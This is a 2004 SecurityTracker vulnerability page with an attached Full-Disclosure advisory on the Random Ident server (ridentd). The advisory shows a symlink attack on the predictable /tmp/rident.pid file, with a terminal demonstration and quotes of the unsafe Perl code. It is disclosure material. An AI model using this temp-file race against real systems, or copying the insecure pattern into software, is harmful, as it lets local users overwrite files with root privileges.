SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  ridentd Vendors:  Meijer, Rob J.
Random Ident Server (ridentd) Lets Local Users Overwrite Certain Files
SecurityTracker Alert ID:  1009552
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 24 2004
Impact:  Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.9.1b
Description:  A vulnerability was reported in the Random Ident server (ridentd). A local user can cause certain types of files to be overwritten.

Martin reported that 'rident.pl' uses a temporary file ('/tmp/rident.pid') in an unsafe manner. The file is used to store the process ID (PID) of the ridentd process. A local user can create a symbolic link (symlink) from a file on the target system to the temporary file. Then, when ridentd is started, the symlinked file will be overwritten with root privileges with the PID of identd.

According to the report, the linked file must contain only numerical characters for the exploit to work.
Impact:  A local user can cause arbitrary files with numerical contents to be overwritten with root privileges.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.xs4all.nl/~rmeijer/rident.html (Links to External Site)
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Martin <broadcast@mail.ptraced.net>
Message History:   None.

 Source Message Contents
Date:  Wed, 24 Mar 2004 11:16:38 -0300
From:  Martin <broadcast@mail.ptraced.net>
Subject:  [Full-Disclosure] rident.pl 0.9 file "deletion" and PID files modification

 

This is a multi-part message in MIME format.
--------------020808020601020305040907
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Advisory attached.
Future advisories may be found at http://broadcast.ptraced.net


--------------020808020601020305040907
Content-Type: text/plain;
 name="004-rident.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="004-rident.txt"

rident.pl 0.9.1b file "deletion" and PID files modification.

Martin (broadcast@mail.ptraced.net)

-------------------
Program Description
-------------------

Random Ident server (ridentd)

"This server application is meant for the totally paranoid that need 
access
to servers that require ident and don't want to give any information
about local users to the remote server or its other users.

...

The really paranoid may wish to start ridentd a few times a day 
from their cron in order to reseed both the random set of dictionary 
words
and the port modulo. When using in the cron it is adviced to use the 
'SILENT' option."

-----------------------------------
Problem Description and Explotation
-----------------------------------

$ ./ridentd.pl 

***** Random Ident Server 0.9.0b *****
* Using file /usr/lib/ispell/britishmed+.hash
* Counting usable words
* Generating random selection of 1184 from 38642
* Generating insertion table    
* Aquiring names
* 1184 words fetched             
  (local ports belonging to each uniq modulus of 1184 get
   a dictionary word assigned to them)
Need to be root to bind to the ident port

$ ls -l /tmp

lrwxrwxrwx    1 broadcast broadcast        4 2004-03-21 20:52 rident.pid -> sexy
-rw-r--r--    1 broadcast broadcast        4 2004-03-21 20:52 sexy

$ cat sexy
123

$ su -
Password: 

# ./rident.pl

***** Random Ident Server 0.9.0b *****
* Using file /usr/lib/ispell/britishmed+.hash
* Counting usable words
* Generating random selection of 2212 from 38642
* Generating insertion table    
* Aquiring names
* 2212 words fetched             
  (local ports belonging to each uniq modulus of 2212 get
   a dictionary word assigned to them)
* PID file found
* Checking for process with pid 123
* pid file apears to be old
* Binding to port 113
* Forking to background
* BG Process active
* BG Process seting uid/gid to nobody 65534/65534
* Looking if we can do socketpair lookups : Yep: LINUX

# cat /tmp/sexy
20199 

# exit

PID Files modification. Any user could link /tmp/rident.pid to any PID 
file. In fact, any user could link it to a file that only contains 
numerical characters. 

  unless ($opid =~ /^\d+$/)
  {
    print "HEY, SOMEONE F*CKED UP MY PIDFILE /tmp/rident.pid\n";
    exit;
  }

Potty mouth. Censored.
That's the starting point of the race, which ends in:

if ($pid)
 
  open(PID,">/tmp/rident.pid");
  print PID "$pid\n";
  close(PID);
  exit;
 

Winning the race will make the daemon write the PID number of the 
process into any file.

------------------
Possible Solutions
------------------

Discontinuing use of LSD may help with the paranoia.
Add a real check when opening /tmp/rident.pid instead of a regexp.
Discontinue the use of foul language.
Add another real check when reopening /tmp/rident.pid.

----------------
Vendor Contacted
----------------

Not yet.

------------
Official Fix
------------

None yet.

-------------
Related Links
-------------

http://www.securityfocus.com/tools/1935
http://www.xs4all.nl/~rmeijer/rident.html 


--------------020808020601020305040907--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC